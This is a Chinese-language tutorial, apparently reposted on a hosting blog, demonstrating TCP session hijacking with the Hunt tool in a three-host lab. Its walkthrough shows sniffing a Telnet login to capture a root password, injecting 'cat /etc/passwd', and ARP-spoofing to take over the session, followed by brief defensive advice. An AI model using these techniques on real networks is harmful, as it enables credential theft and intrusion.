要知道很多工具都可以进行会话劫持,比如说相对常用的juggernaut、TTY Watcher,还有如Dsniff这样的工具包也可以实现会话劫持。但是本此的会话劫持实例演示还是通过经典工具Hunt来进行。Hunt可以说是功能非常强大,并且可以把会话劫持技术发挥得淋漓尽致。
本次会话劫持实例演示所使用的Hunt是1.5,可以到Pavel Krauz网站下载源代码包和二进制文件:
lin.fsid.cvut.cz/~kra/#hunt。
现在来看看如果使用Hunt,首先是下载并编译源代码:
[root@dahubaobao hunt]#wget
[root@dahubaobao>www.ringz.org/hunt-1.5.tgz
[root@dahubaobao hunt]#tar zxvf hunt-1.5.tgz
[root@dahubaobao hunt]#cd hunt-1.5
[root@dahubaobao hunt-1.5]#make
[root@dahubaobao hunt-1.5]#./hunt
//Hunt是完全交互试的操作
解释一下各个选项的含义
l/w/r) list/watch/reset connections
//l(字母l)为查看当前网络上的会话;w为监视当前网络上的某个会话;r为重置当前网络上的某个会话。
a) arp/simple hijack (avoids ack storm if arp used)
//中间人攻击(会话劫持),Hunt先进行ARP欺骗,然后进行会话劫持。使用此方法可以避免出现ACK风暴。
s) simple hijack
//简单的会话劫持,也就是注射式攻击。会出现ACK风暴。
d) daemons rst/arp/sniff/mac
//该选项共实现四个功能,分别为:终止会话,自动发送带RST标志位的TCP包;ARP欺骗后进行数据包转发;不用说了,嗅探功能;在当前网络上收集MAC地址。
其他的选项很简单,不在多说了。还是来看看具体的例子吧,我想大家都等不及了!^_^
应用实例
测试环境:
攻击者:Red Hat Linux 9.0 IP:192.168.0.10
主机A:Windows Advanced Server IP:192.168.0.1
主机B:FreeBSD 4.9 STABLE IP:192.168.0.20
[root@dahubaobao hunt-1.5]#./hunt
/*
* hunt 1.5
* multipurpose connection intruder / sniffer for Linux
* (c) 1998-2000 by kra
*/
starting hunt
— Main Menu — rcvpkt 0, free/alloc 63/64 ——
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
*> l //查看当前网络上的会话
0)192.168.0.1 [3465] ?192.168.0.20 [23]
//主机A正在Telnet到主机B
— Main Menu — rcvpkt 0, fr
ee/alloc 63/64 ——
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
*> w //监视当前网络上的会话
0)192.168.0.1 [3465] ?192.168.0.20 [23]
Choose conn>0 //选择打算监视的会话。由于我的条件有限,不能模拟多个会话,请多见量。
Dump [s]rc/[d]st/[b]oth [b]> //回车
Print sec/dst same charactes y/n [n]> //回车 现在就可以监视会话了。主机A输入的一切内容,我们都可以看到。主机A在Telnet并登陆之后,直接su root,password:后边的就是root的密码。现在这个系统已经完全由你所控制了,自由发挥吧!
— Main Menu — rcvpkt 0, free/alloc 63/64 ——
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
*> s //进行注射式会话劫持
0)192.168.0.1 [3465] ?192.168.0.20 [23]
choose conn> 0
dump connection y/n [n]>
Enter the command string you wish executed or [cr]> cat /etc/passwd#p#
攻击者的意图是获取主机B的passwd文件的内容,但由于注射式会话劫持缺陷,导致了ACK风暴,所以Hunt向会话双方发送了一个带RST标志位的TCP包来阻止ACK风暴。
— Main Menu — rcvpkt 0, free/alloc 63/64 ——
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
*> a //进行中间人会话劫持
0)192.168.0.1 [3862] ?192.168.0.20 [23]
choose conn> 0
arp spoof src in dst y/n [y]>
src MAC [XX:XX:XX:XX:XX:XX]>
arp spoof dst in src y/n [y]>
dst MAC [XX:XX:XX:XX:XX:XX]>
input mode [r]aw, [l]ine+echo+\r, line+[e]cho [r]>
dump connectin y/n [y]> n
press key to take voer of connection
ARP spoof of 192.168.0.20 with fake mac XX:XX:XX:XX:XX:XX in host 192.168.0.1 FA
ILED
do you want to force arp spoof nutil successed y/n [y]>
CTRL-C to break
CTRL+C //手工输入CTRL+C中断,不需等待
— operation canceled – press any key>
ARP spoof failed
ARP spoof of 192.168.0.20 in host 192.168.0.1 FAILED
you took over the connection
CTRL-] to break
-bash-2.05b$id
………………..
在这次会话劫持实例的演示中,攻击者已经成功的劫持了主机A和B之间的Telnet会话。主机A输入的一切命令攻击者都可以看到,并且攻击者也可以自行插入命令。正如前边所说的,这种会话劫持方式先进行ARP欺骗,然后才劫持,所以,ACK风暴是不会出现的;而且,这种方式要比注射式会话劫持危害更大,从上文中我想就能看出来,我就不必在多说什么了。还有一些如Sniffer等功能,都很简单,由于已不在本文范畴,故不在多说。
会话劫持防范
防范会话劫持是一个比较大的工程。首先应该使用交换式网络替代共享式网络,虽然像Hunt这样的工具可以在交换环境中实现会话劫持,但还是应该使用交换式网络替代共享式网络,因为这样可以防范最基本的嗅探攻击。然而,最根本的解决办法是采用加密通讯,使用SSH代替Telnet、使用SSL代替HTTP,或者干脆使用IPSec/VPN,这样会话劫持就无用武之地了。其次,监视网络流量,如发现网络中出现大量的ACK包,则有可能已被进行了会话劫持攻击。
还有一点是比较重要的,就是防范ARP欺骗。
【编辑推荐】
- 黑客不爱软件漏洞 更喜欢利用错误配置
- “90后”黑客攻击南京房管局网站
- Black Hat和Defcon黑客大会的五大看点
- 路由器漏洞:黑客展示如何攻陷百万台
- 揭秘黑客手中DDoS攻击利器——黑色能量2代
文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/148099.html<
